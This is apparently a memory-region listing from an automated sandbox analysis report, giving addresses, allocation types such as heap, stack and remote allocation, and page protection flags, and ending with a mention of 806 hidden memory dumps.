stack
page read and write
263D000
stack
page read and write
1F640AE0000
heap
page read and write
4A0F000
heap
page read and write
1FD54C21000
trusted library allocation
page read and write
1F640DBD000
heap
page read and write
2E84000
heap
page read and write
3139000
heap
page read and write
4A00000
heap
page read and write
5961000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
1F642AF1000
heap
page read and write
4A01000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
1FD45403000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
703D000
heap
page read and write
2F8A000
heap
page read and write
7558000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
502E000
heap
page read and write
6EC0000
heap
page read and write
3D96000
remote allocation
page execute and read and write
1FD451AC000
trusted library allocation
page read and write
230B0000
heap
page read and write
DC0000
trusted library section
page read and write
233C1000
heap
page read and write
88A0000
direct allocation
page read and write
23011000
direct allocation
page execute and read and write
7FFD9BA40000
trusted library allocation
page read and write
6D1E000
stack
page read and write
1FD44A30000
trusted library allocation
page read and write
4A0D000
heap
page read and write
4A09000
heap
page read and write
7DF49F7F0000
trusted library allocation
page execute and read and write
8324000
heap
page read and write
1DD000
stack
page read and write
4A01000
heap
page read and write
4928000
heap
page read and write
2E84000
heap
page read and write
1FD45F18000
trusted library allocation
page read and write
4A16000
heap
page read and write
70AE000
heap
page read and write
2F13000
trusted library allocation
page execute and read and write
833C000
heap
page read and write
4A0A000
heap
page read and write
4A0D000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
170467D0000
heap
page read and write
486C000
stack
page read and write
1FD42FE4000
heap
page read and write
4A0A000
heap
page read and write
26BE000
stack
page read and write
1FD43050000
heap
page read and write
71C0000
heap
page readonly
299F000
unkown
page read and write
827E000
stack
page read and write
1F640DA9000
heap
page read and write
22AED000
stack
page read and write
3050000
trusted library allocation
page read and write
2E84000
heap
page read and write
70BA000
heap
page read and write
1FD42FA3000
heap
page read and write
8334000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
45D000
system
page execute and read and write
22D5E000
stack
page read and write
4D61000
heap
page read and write
BA76000
direct allocation
page execute and read and write
1FD54C10000
trusted library allocation
page read and write
97CF6FE000
stack
page read and write
2F30000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
5A409BE000
stack
page read and write
1FD5D2A1000
heap
page read and write
1FD42F50000
heap
page read and write
27A0000
heap
page read and write
7377000
heap
page read and write
1F6429B1000
heap
page read and write
7530000
trusted library allocation
page read and write
29AF000
stack
page read and write
3923000
heap
page read and write
2E70000
heap
page read and write
5A405FE000
stack
page read and write
7550000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page read and write
2E84000
heap
page read and write
77FB000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
2B50000
heap
page read and write
5989000
trusted library allocation
page read and write
4A1B000
heap
page read and write
1F640DA9000
heap
page read and write
7780000
trusted library allocation
page read and write
1FD453C7000
trusted library allocation
page read and write
2FEE000
stack
page read and write
7520000
heap
page execute and read and write
8190000
heap
page read and write
2EDE000
stack
page read and write
2FF8000
heap
page read and write
4905000
heap
page execute and read and write
2323A000
heap
page read and write
1F640C4D000
heap
page read and write
17046680000
heap
page read and write
5005000
heap
page read and write
7710000
trusted library allocation
page read and write
4A18000
heap
page read and write
7327000
heap
page read and write
2323A000
heap
page read and write
507B000
heap
page read and write
1F640D8F000
heap
page read and write
82E0000
heap
page read and write
2F90000
trusted library allocation
page execute and read and write
5000000
trusted library allocation
page read and write
4A09000
heap
page read and write
1F642D16000
heap
page read and write
1FD4687A000
trusted library allocation
page read and write
230B1000
heap
page read and write
456000
system
page execute and read and write
CC0000
heap
page read and write
6D5E000
stack
page read and write
1FD4637A000
trusted library allocation
page read and write
500A000
heap
page read and write
500D000
heap
page read and write
D6D000
heap
page read and write
1FD44AC0000
heap
page read and write
1FD5CFA0000
heap
page read and write
1FD43180000
heap
page read and write
459000
system
page execute and read and write
507B000
heap
page read and write
702F000
heap
page read and write
91D7000
trusted library allocation
page read and write
170467D5000
heap
page read and write
17046470000
heap
page read and write
8187000
stack
page read and write
500A000
heap
page read and write
7570000
trusted library allocation
page read and write
1FD44E26000
trusted library allocation
page read and write
4A18000
heap
page read and write
4A05000
heap
page read and write
23EE000
unkown
page read and write
4D60000
heap
page read and write
871E000
stack
page read and write
501C000
heap
page read and write
81A0000
trusted library allocation
page execute and read and write
1FD5D450000
heap
page read and write
1F640CE7000
heap
page read and write
AB8000
stack
page read and write
9180000
direct allocation
page execute and read and write
23F0000
heap
page read and write
4A0A000
heap
page read and write
400000
system
page execute and read and write
507B000
heap
page read and write
23896000
unclassified section
page execute and read and write
507B000
heap
page read and write
70E6000
heap
page read and write
4D61000
heap
page read and write
231F6FF000
stack
page read and write
1F6429B6000
heap
page read and write
231A1000
heap
page read and write
22A00000
direct allocation
page read and write
5A406FD000
stack
page read and write
73EF000
heap
page read and write
4A0D000
heap
page read and write
869E000
stack
page read and write
313B000
heap
page read and write
75A0000
trusted library allocation
page read and write
1F6429BF000
heap
page read and write
4A0F000
heap
page read and write
231F5FF000
unkown
page read and write
8820000
trusted library allocation
page execute and read and write
1FD5D26F000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
97CF2FE000
stack
page read and write
5A40273000
stack
page read and write
2ACC000
stack
page read and write
5A4073E000
stack
page read and write
323C000
stack
page read and write
1F6429B0000
heap
page read and write
97CFBFB000
stack
page read and write
1F6429BD000
heap
page read and write
1FD42F67000
heap
page read and write
2E84000
heap
page read and write
3130000
heap
page read and write
2720000
heap
page read and write
507B000
heap
page read and write
1FD5D2D8000
heap
page read and write
1FD453B5000
trusted library allocation
page read and write
494E000
stack
page read and write
1FD44C84000
trusted library allocation
page read and write
4A00000
heap
page read and write
45C000
system
page execute and read and write
6F6D000
stack
page read and write
4A00000
heap
page read and write
1FD5D2D2000
heap
page read and write
1FD5CFA2000
heap
page read and write
1F642D0F000
heap
page read and write
2BE0000
heap
page read and write
71E0000
direct allocation
page read and write
70B6000
heap
page read and write
22FA0000
heap
page read and write
4F01000
heap
page read and write
1FD453AB000
trusted library allocation
page read and write
1F640C4D000
heap
page read and write
5200000
trusted library allocation
page read and write
343E000
stack
page read and write
4A18000
heap
page read and write
2DE0000
heap
page readonly
6EE0000
direct allocation
page read and write
81D0000
trusted library allocation
page read and write
2A9D000
stack
page read and write
8770000
trusted library allocation
page read and write
4A01000
heap
page read and write
2346A000
heap
page read and write
4E30000
trusted library allocation
page read and write
97CFAFE000
stack
page read and write
4A07000
heap
page read and write
7240000
direct allocation
page read and write
1FD453EB000
trusted library allocation
page read and write
2AFF000
stack
page read and write
1FD44AC7000
heap
page read and write
1FD44980000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
4A26000
heap
page read and write
2E00000
heap
page read and write
1FD43033000
heap
page read and write
7FFD9B772000
trusted library allocation
page read and write
1F642A18000
heap
page read and write
CB0000
trusted library section
page read and write
97CEF3A000
stack
page read and write
3400000
heap
page read and write
2B9D000
stack
page read and write
5002000
heap
page read and write
4A10000
heap
page read and write
500A000
heap
page read and write
7000000
heap
page read and write
8328000
heap
page read and write
7200000
direct allocation
page read and write
7367000
heap
page read and write
7730000
trusted library allocation
page read and write
22F5D000
stack
page read and write
3279000
stack
page read and write
1FD46985000
trusted library allocation
page read and write
1F642D00000
heap
page read and write
1F6429B1000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
9C76000
direct allocation
page execute and read and write
5A404FC000
stack
page read and write
D3A000
heap
page read and write
8280000
heap
page read and write
8880000
direct allocation
page read and write
4A0A000
heap
page read and write
2F60000
trusted library allocation
page read and write
7FFD9B826000
trusted library allocation
page read and write
2B54000
heap
page read and write
1F640CF4000
heap
page read and write
97CF8FD000
stack
page read and write
1FD45400000
trusted library allocation
page read and write
231C1000
heap
page read and write
1F640D88000
heap
page read and write
1FD46873000
trusted library allocation
page read and write
70AE000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1F640BC0000
heap
page read and write
2B54000
heap
page read and write
22CDE000
stack
page read and write
70B0000
heap
page read and write
6E6B000
stack
page read and write
1FD44AD4000
heap
page read and write
5001000
heap
page read and write
6596000
remote allocation
page execute and read and write
400000
system
page execute and read and write
1F640D81000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
4A02000
heap
page read and write
6F2E000
stack
page read and write
3080000
heap
page read and write
72C0000
direct allocation
page read and write
1F640C4A000
heap
page read and write
70B7000
heap
page read and write
5200000
trusted library allocation
page read and write
3498000
heap
page read and write
8760000
trusted library allocation
page read and write
C40000
heap
page read and write
5200000
trusted library allocation
page read and write
6E90000
direct allocation
page read and write
3920000
heap
page read and write
1F642CF6000
heap
page read and write
5005000
heap
page read and write
5001000
heap
page read and write
7FFD9B910000
trusted library allocation
page read and write
2332C000
heap
page read and write
1F640D99000
heap
page read and write
1F640D5F000
heap
page read and write
1FD54C01000
trusted library allocation
page read and write
500A000
heap
page read and write
6EB5000
heap
page read and write
1F640CC8000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1F640D00000
heap
page read and write
865B000
stack
page read and write
31CF000
unkown
page read and write
7210000
direct allocation
page read and write
22B2C000
stack
page read and write
1F640DBD000
heap
page read and write
4F01000
heap
page read and write
4A00000
heap
page read and write
2877000
heap
page read and write
2670000
heap
page read and write
2F1D000
trusted library allocation
page execute and read and write
2B54000
heap
page read and write
23CD000
stack
page read and write
1FD449F0000
trusted library allocation
page read and write
507B000
heap
page read and write
6EA0000
direct allocation
page read and write
7432000
heap
page read and write
313E000
heap
page read and write
500D000
heap
page read and write
1FD5CFF8000
heap
page read and write
2A9F000
stack
page read and write
229E0000
direct allocation
page read and write
1FD45228000
trusted library allocation
page read and write
737C000
heap
page read and write
766E000
stack
page read and write
75CA000
trusted library allocation
page read and write
8850000
direct allocation
page read and write
507B000
heap
page read and write
5A4150E000
stack
page read and write
1F6429C3000
heap
page read and write
1FD54EF9000
trusted library allocation
page read and write
500A000
heap
page read and write
2EBE000
stack
page read and write
23129000
heap
page read and write
4A10000
heap
page read and write
70B2000
heap
page read and write
330D000
heap
page read and write
97CF3FE000
stack
page read and write
2B54000
heap
page read and write
7230000
direct allocation
page read and write
33F0000
heap
page read and write
4A15000
heap
page read and write
71F0000
direct allocation
page read and write
507B000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1FD44BF0000
heap
page read and write
1F640CC0000
heap
page read and write
1FD5D022000
heap
page read and write
22C1E000
stack
page read and write
1FD46A5C000
trusted library allocation
page read and write
5200000
trusted library allocation
page read and write
2389C000
unclassified section
page execute and read and write
1FD5D2C3000
heap
page read and write
7720000
trusted library allocation
page read and write
22B9C000
stack
page read and write
26A0000
heap
page read and write
1FD4539C000
trusted library allocation
page read and write
2B55000
heap
page read and write
312E000
stack
page read and write
72E0000
direct allocation
page read and write
5008000
heap
page read and write
501B000
heap
page read and write
22D9D000
stack
page read and write
2F29000
trusted library allocation
page read and write
87BE000
stack
page read and write
231F4FD000
stack
page read and write
2E8F000
stack
page read and write
225FD000
stack
page read and write
1FD5D120000
heap
page read and write
22A8F000
stack
page read and write
7FFD9B780000
trusted library allocation
page read and write
8570000
trusted library allocation
page execute and read and write
3137000
heap
page read and write
2257E000
stack
page read and write
27C5000
heap
page read and write
4A12000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
5013000
heap
page read and write
1F640CFD000
heap
page read and write
26FE000
stack
page read and write
855C000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
6CDE000
stack
page read and write
1F640DAC000
heap
page read and write
22FE0000
unclassified section
page execute and read and write
81B0000
trusted library allocation
page read and write
5A4160B000
stack
page read and write
6EC0000
direct allocation
page read and write
2E80000
heap
page read and write
4A0F000
heap
page read and write
1FD5D200000
heap
page execute and read and write
4A16000
heap
page read and write
D30000
heap
page read and write
225BE000
stack
page read and write
507B000
heap
page read and write
1F642D26000
heap
page read and write
75B0000
trusted library allocation
page read and write
2E84000
heap
page read and write
8860000
direct allocation
page read and write
1F6429CF000
heap
page read and write
7320000
heap
page read and write
6D9E000
stack
page read and write
6FE0000
heap
page read and write
1FD54EEA000
trusted library allocation
page read and write
4A23000
heap
page read and write
2B55000
heap
page read and write
7270000
direct allocation
page read and write
2AE0000
heap
page read and write
473000
system
page execute and read and write
23010000
direct allocation
page read and write
5200000
trusted library allocation
page read and write
1F640D94000
heap
page read and write
5B96000
remote allocation
page execute and read and write
1FD43029000
heap
page read and write
2F42000
trusted library allocation
page read and write
232B2000
heap
page read and write
5AEE000
trusted library allocation
page read and write
22DDE000
stack
page read and write
8362000
heap
page read and write
1F640C4A000
heap
page read and write
2E84000
heap
page read and write
70D2000
heap
page read and write
1FD449B0000
heap
page readonly
CCC000
heap
page read and write
22BDC000
stack
page read and write
237C0000
unclassified section
page execute and read and write
2B90000
heap
page readonly
8800000
trusted library allocation
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
4A01000
heap
page read and write
2F78000
heap
page read and write
1704656B000
heap
page read and write
4A0D000
heap
page read and write
8840000
trusted library allocation
page read and write
702E000
stack
page read and write
706D000
stack
page read and write
4900000
heap
page execute and read and write
71EF000
stack
page read and write
1FD44AC5000
heap
page read and write
1F642CDD000
heap
page read and write
1FD44AA0000
heap
page execute and read and write
392C000
heap
page read and write
5A4047E000
stack
page read and write
4F01000
heap
page read and write
709F000
heap
page read and write
2F3A000
trusted library allocation
page execute and read and write
4A10000
heap
page read and write
17046660000
heap
page read and write
27C4000
heap
page read and write
1F640C4D000
heap
page read and write
875D000
stack
page read and write
2B03000
stack
page read and write
22D1C000
stack
page read and write
7760000
trusted library allocation
page read and write
5A40B3B000
stack
page read and write
22C9B000
stack
page read and write
5007000
heap
page read and write
378F000
stack
page read and write
709F000
heap
page read and write
76F0000
trusted library allocation
page read and write
2381D000
unclassified section
page execute and read and write
7290000
direct allocation
page read and write
22F9E000
stack
page read and write
2FF0000
heap
page read and write
1FD4637F000
trusted library allocation
page read and write
72D0000
direct allocation
page read and write
4A38000
heap
page read and write
4A15000
heap
page read and write
7770000
trusted library allocation
page read and write
2F14000
trusted library allocation
page read and write
23A0000
heap
page read and write
2B54000
heap
page read and write
283E000
stack
page read and write
2F0F000
stack
page read and write
32CF000
stack
page read and write
2349A000
heap
page read and write
7280000
direct allocation
page read and write
232B2000
heap
page read and write
712E000
stack
page read and write
23840000
unclassified section
page execute and read and write
C10000
heap
page read and write
2292F000
stack
page read and write
4A01000
heap
page read and write
5AF4000
trusted library allocation
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
2E84000
heap
page read and write
823E000
stack
page read and write
A7C000
stack
page read and write
5A407BE000
stack
page read and write
1F640C4D000
heap
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
4A26000
heap
page read and write
1F642D27000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
1FD453D7000
trusted library allocation
page read and write
1F640D84000
heap
page read and write
1F640C45000
heap
page read and write
4A16000
heap
page read and write
5A403FE000
stack
page read and write
1FD4540B000
trusted library allocation
page read and write
7260000
direct allocation
page read and write
4E23000
heap
page read and write
1FD42FB7000
heap
page read and write
22700000
heap
page read and write
C48000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
23819000
unclassified section
page execute and read and write
2F80000
heap
page readonly
400000
system
page execute and read and write
1FD449F2000
trusted library allocation
page read and write
1FD44AA7000
heap
page execute and read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9B921000
trusted library allocation
page read and write
49E0000
heap
page read and write
2B54000
heap
page read and write
1F640DA0000
heap
page read and write
86DC000
stack
page read and write
2F20000
trusted library allocation
page read and write
8870000
direct allocation
page read and write
1F640CF5000
heap
page read and write
2B54000
heap
page read and write
23026000
direct allocation
page execute and read and write
7FFD9BAA0000
trusted library allocation
page read and write
A676000
direct allocation
page execute and read and write
2E4E000
unkown
page read and write
4A12000
heap
page read and write
4A00000
heap
page read and write
34AC000
heap
page read and write
7360000
heap
page read and write
308A000
heap
page read and write
2263E000
stack
page read and write
2700000
heap
page read and write
33C0000
heap
page read and write
2B55000
heap
page read and write
7008000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
2B54000
heap
page read and write
75A7000
trusted library allocation
page read and write
1F642D1C000
heap
page read and write
7700000
trusted library allocation
page read and write
4A11000
heap
page read and write
6EB0000
direct allocation
page read and write
1FD5CF49000
heap
page read and write
2F90000
heap
page read and write
313B000
heap
page read and write
4A16000
heap
page read and write
4A0A000
heap
page read and write
71D0000
direct allocation
page read and write
2B54000
heap
page read and write
5013000
heap
page read and write
4A0D000
heap
page read and write
4961000
trusted library allocation
page read and write
1F640DBD000
heap
page read and write
1FD449A0000
trusted library allocation
page read and write
1F642D28000
heap
page read and write
239D000
stack
page read and write
2E84000
heap
page read and write
70AE000
heap
page read and write
226E0000
heap
page read and write
5005000
heap
page read and write
1F640D89000
heap
page read and write
70B6000
heap
page read and write
7099000
heap
page read and write
4A15000
heap
page read and write
7FFD9B830000
trusted library allocation
page execute and read and write
762E000
stack
page read and write
5A40ABE000
stack
page read and write
4A00000
heap
page read and write
3CA0000
remote allocation
page execute and read and write
1FD45070000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
2E2E000
stack
page read and write
2D00000
heap
page read and write
7350000
heap
page read and write
4796000
remote allocation
page execute and read and write
1F640D19000
heap
page read and write
7540000
trusted library allocation
page execute and read and write
22A4E000
stack
page read and write
4F00000
heap
page read and write
75C0000
trusted library allocation
page read and write
1F640D82000
heap
page read and write
23439000
heap
page read and write
1F640D19000
heap
page read and write
1F6429B6000
heap
page read and write
1FD5D230000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
81C0000
heap
page read and write
1F640BE0000
heap
page read and write
C8E000
stack
page read and write
4A01000
heap
page read and write
313A000
heap
page read and write
2B54000
heap
page read and write
5009000
heap
page read and write
7FFD9B774000
trusted library allocation
page read and write
1F6429B6000
heap
page read and write
5A4158D000
stack
page read and write
76ED000
stack
page read and write
3300000
heap
page read and write
49DF000
stack
page read and write
7220000
direct allocation
page read and write
1F640D0D000
heap
page read and write
4F5F000
stack
page read and write
27C2000
heap
page read and write
7043000
heap
page read and write
CFE000
heap
page read and write
2FCF000
stack
page read and write
500D000
heap
page read and write
2B55000
heap
page read and write
2B54000
heap
page read and write
7740000
trusted library allocation
page read and write
5196000
remote allocation
page execute and read and write
368F000
stack
page read and write
5A402FE000
stack
page read and write
1F642CF6000
heap
page read and write
313A000
heap
page read and write
229D0000
direct allocation
page read and write
1FD45E0B000
trusted library allocation
page read and write
2E84000
heap
page read and write
There are 806 hidden memdumps, click here to show them.